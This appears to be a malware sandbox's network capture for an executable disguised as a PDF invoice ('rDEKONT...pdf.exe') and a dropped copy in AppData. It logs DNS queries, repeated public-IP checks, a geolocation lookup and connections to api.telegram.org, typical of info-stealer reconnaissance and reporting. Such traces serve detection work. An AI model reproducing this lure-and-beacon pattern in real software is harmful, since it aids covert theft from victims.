                                                                                                                                                        Jan 16, 2025 07:02:16.762437105 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.767306089 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.453342915 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.456933022 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.456980944 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.457037926 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.457273006 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.457289934 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.507591009 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:17.920289040 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.932430983 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.932470083 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.071536064 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.071681976 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.071760893 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:18.072071075 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:18.081146955 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:18.081902981 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.081948996 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.083410978 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.083870888 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.083888054 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.086915016 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.086966038 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:18.742834091 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.742960930 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.744899988 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.744930029 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.745321035 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.746867895 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.787365913 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:19.008114100 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:19.008280039 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:19.008348942 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:19.010726929 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:22.682938099 CET4973780192.168.2.4132.226.247.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 16, 2025 07:02:02.249608994 CET | 59076 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2025 07:02:02.256432056 CET | 53 | 59076 | 1.1.1.1 | 192.168.2.4
Jan 16, 2025 07:02:03.250842094 CET | 55729 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2025 07:02:03.257628918 CET | 53 | 55729 | 1.1.1.1 | 192.168.2.4
Jan 16, 2025 07:02:14.103185892 CET | 49641 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2025 07:02:14.109883070 CET | 53 | 49641 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 16, 2025 07:02:02.249608994 CET | 192.168.2.4 | 1.1.1.1 | 0x7436 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.250842094 CET | 192.168.2.4 | 1.1.1.1 | 0xc163 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:14.103185892 CET | 192.168.2.4 | 1.1.1.1 | 0x9d98 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 16, 2025 07:02:02.256432056 CET | 1.1.1.1 | 192.168.2.4 | 0x7436 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 16, 2025 07:02:02.256432056 CET | 1.1.1.1 | 192.168.2.4 | 0x7436 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:02.256432056 CET | 1.1.1.1 | 192.168.2.4 | 0x7436 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:02.256432056 CET | 1.1.1.1 | 192.168.2.4 | 0x7436 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:02.256432056 CET | 1.1.1.1 | 192.168.2.4 | 0x7436 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:02.256432056 CET | 1.1.1.1 | 192.168.2.4 | 0x7436 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.257628918 CET | 1.1.1.1 | 192.168.2.4 | 0xc163 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.257628918 CET | 1.1.1.1 | 192.168.2.4 | 0xc163 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.257628918 CET | 1.1.1.1 | 192.168.2.4 | 0xc163 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.257628918 CET | 1.1.1.1 | 192.168.2.4 | 0xc163 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.257628918 CET | 1.1.1.1 | 192.168.2.4 | 0xc163 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.257628918 CET | 1.1.1.1 | 192.168.2.4 | 0xc163 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:03.257628918 CET | 1.1.1.1 | 192.168.2.4 | 0xc163 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 07:02:14.109883070 CET | 1.1.1.1 | 192.168.2.4 | 0x9d98 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                        • api.telegram.org
                                                                                                                                                        • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:02.286500931 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
Jan 16, 2025 07:02:02.972321987 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:02 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 07:02:02.990948915 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
Jan 16, 2025 07:02:03.206130981 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:03 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 07:02:03.934973001 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
Jan 16, 2025 07:02:04.147552013 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:04 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:04.983462095 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
Jan 16, 2025 07:02:05.658143044 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:05 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:06.023052931 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
Jan 16, 2025 07:02:06.698771000 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 07:02:06.718485117 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
Jan 16, 2025 07:02:06.927599907 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 07:02:08.039510012 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
Jan 16, 2025 07:02:08.248792887 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:06.293421030 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
Jan 16, 2025 07:02:06.976210117 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:07.618292093 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
Jan 16, 2025 07:02:08.295749903 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49747 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:08.862938881 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
Jan 16, 2025 07:02:09.538466930 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:09 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49748 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:08.909589052 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:09.584110022 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:09 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49752 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:10.204824924 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:10.888091087 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:10 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49751 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:10.326970100 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:10.897293091 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:10 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49755 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:11.500195980 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:12.179640055 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:12 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49756 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:11.516803980 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:12.191920042 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:12 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49759 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:12.798032999 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:13.487201929 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:13 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49760 | 132.226.247.73 | 80 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:12.809525013 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:13.481650114 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:13 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49763 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:14.102813959 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:14.795737982 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:14 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49767 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:15.421257973 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 16, 2025 07:02:16.113840103 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Thu, 16 Jan 2025 06:02:16 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49771 | 132.226.247.73 | 80 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
Jan 16, 2025 07:02:16.762437105 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
Jan 16, 2025 07:02:17.453342915 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:17 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:03 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
2025-01-16 06:02:03 UTC | 863 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:03 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322112
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTz5IGxPGT4AZ0jIwe36gl8RK3G%2F3UHBeFmQoYu04V0ngSjK67HPcK7IRp%2Bpoff6vPIJ32W1Qd42EvwS%2FqB7kzEtpwX3o%2BEk2fbrU6NLF%2B%2BiE4vCLRdT3o30QY5YTzTAS6yD%2FOa7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be4fdfbf6c358-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1461&min_rtt=1454&rtt_var=561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1924851&cwnd=155&unsent_bytes=0&cid=f4ef5a4d55459b98&ts=184&x=0"
2025-01-16 06:02:03 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:04 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-16 06:02:04 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:04 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322113
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0385%2Fq7HD8y7KS7hztkae94%2BMjGkOmiPIo1752MdpVjQotxl33rk2UN%2Bytn7ZKgZapCA6Oa62L3P%2B6dpAphs0XViY3WCzhXah2bZ%2BLn7LJIzkvv1vE%2BrkZbvJnzJgMt4qb7iYHZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be5037e0842e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
